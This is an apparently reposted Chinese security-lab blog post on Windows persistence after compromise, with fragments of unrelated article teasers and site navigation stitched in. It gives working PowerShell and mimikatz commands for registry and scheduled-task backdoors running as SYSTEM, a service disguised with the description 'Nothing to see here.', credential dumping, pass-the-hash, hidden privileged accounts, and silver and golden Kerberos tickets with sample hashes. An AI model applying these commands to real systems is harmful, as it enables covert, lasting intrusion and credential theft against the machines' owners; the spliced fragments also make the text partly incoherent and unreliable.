持续控制技术和策略(A View of Persistence)

释放双眼,带上耳机,听听看~!

【HTB系列】靶机Irked的渗透测试详解

本文作者:是大方子(Ms08067实验室核心成员) Kali: 10.10.13.32 靶机地址:10.10.10.117   先用nmap扫描下靶机 靶机开放了 22 80 111 端口   查看下靶机的80端口 我们用gobuster对网站的目录也进行一次爆破 访问下/manual,得到apache的文档页面没有可以利

本文作者:麦烧玉米(Ms08067实验室红队小组成员)

我们经常会看到一个完整的攻击生命周期,大概有以下7个主要步骤:

  1. Recon

  2. Weaponisation

  3. Delivery

  4. Exploitation

  5. Installation

  6. Command & Control

  7. Actions on Objectives

其中第5个步骤“Installation”意思为“重新获得对系统的命令和控制(如果丢失),而不必重复步骤1到4”。当遇到一些操作不行的时候就要考虑权限问题,uac策略等

在这篇文章中,我会介绍一些基本的持久性策略和技术!通常,触发C2通道的持久性机制存在于以下级别之一:

  1. 中等强制级别,在标准用户的上下文中。

  2. 在SYSTEM的背景下强制性水平较高。

UserLand 技术

HKCU:

HKCRHKEY_CLASSES_ROOT
HKCU
HKEY_CURRENT_USER
HKLM
HKEY_LOCAL_MACHINE
HKU
HKEY_USERS
HKCC
HKEY_CURRENT_CONFIG

创建一个REG_SZ值 字符串值 在HKCU\Software\Microsoft\Windows (其他的也行)

name Backdoor
data C:\users\CreaTe\AppData\Local\Temp\backdoor.exe

启动:

在用户启动文件夹中创建批处理脚本
gc–Get-Content

@ echo off
start /d “C:\Windows\System32\” calc.exe
pause
难受不会写bat bat的作用应该是每次开机都启动bat触发backdoor.exe

计划任务:

PS C:\> $A = New-ScheduledTaskAction -Execute “cmd.exe” -Argument “/c
C:\Users\Rasta\AppData\Local\Temp\backdoor.exe”
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User “Rasta”
PS C:\> $P = New-ScheduledTaskPrincipal “Rasta”
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D

Powershell配置文件:

Elevated技术

HKLM:

HKLMHKEY_LOCAL_MACHINE
HKLM\Software\Microsoft\Windows
name/data

服务:

创建将自动或按需启动的服务
PS C:\> New-Service -Name “Backdoor” -BinaryPathName
“C:\Windows\Temp\backdoor.exe” -Description “Nothing to see here.”

计划任务:

System运行 每天上午9
PS C:\> $A = New-ScheduledTaskAction -Execute “cmd.exe” -Argument “/c
C:\Windows\Temp\backdoor.exe”
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal “NT AUTHORITY\SYSTEM” -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D

维持特权:

runas脚本http://xinn.org/RunasVBS.html

参考:https://blog.csdn.net/u010984552/article/details/54891615

“净网2019”打击网络色情,实录渗透某成人“抖音”

本文作者:曲云杰(MS08067实验室合伙人 & Web小组组长) 起因 经排查发现该app为成人版”抖音”,响应国家净网行动,坚决打击非法传播传播淫秽物品行为! 经过 下载该app,并对其进行测试。 使用BurpSuite抓包,环境为: 夜神模拟器(安卓4)+Xpose框架+Just trus

NTLM哈希:

权限始终是一个问题
导出Server Hash
mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” “exit” > log.txt

sekurlsa::pth /user:Administrator /domain:GOD
/ntlm:ccef208c6485269c20db2cad21734fe7 (/run
:运行的程序,默认
cmd)

添加新的本地用户可以提供一种返回计算机的方法。如果将它们放在
Administrators组中太明显,请使用其他特权组,例如Remote Desktop
Users
Remote Management UsersBackup Operators

白银票据:

mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” “exit” > log.txt
mimikatz “kerberos::golden /domain:<
域名> /sid:<SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLM Hash> /user:<用户名>/ptt” exit

参考: https://paper.tuisec.win/detail/af2385f4ed3a391
kerberos::golden /domain:GOD /sid:S-1-5-21-1218902331-2157346161-
1782232778 /target: WebServer /service: cifs
/rc4:518b98ad4178a53695dc997aa02d455c /user:Administrator /ptt exit

OWA2010CN-God

黄金票据:

拿下域控 lsadump::dcsync /domain:域名 /user:krbtgt
ms14068
mimikatz kerberos::golden /domain:<域名> /sid:<SID> /rc4:<KRBTGT
NTLM Hash> /user:<
任意用户名> /ptt exit


来源:Ms08067安全实验室



界世的你当

作你的肩膀



 ms08067安全实验室

本文源自微信公众号:Ms08067安全实验室

喜报

祝贺团队“DM”和“是大方子”通过Security+信息安全技术专家认证,特别是“是大方子”获得812高分,是同期学员中的最高分! “是大方子”是公众号【HTB靶场系列】的作者,喜欢的兄弟可以长期关注更新! 【HTB靶场系列】如何获得邀请码及跟HTB建立连接 【HTB

人已赞赏
安全工具

从WebShell到域控实战详解

2019-10-14 20:15:33

安全工具

【HTB系列】靶机Irked的渗透测试详解

2019-10-14 20:15:42

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索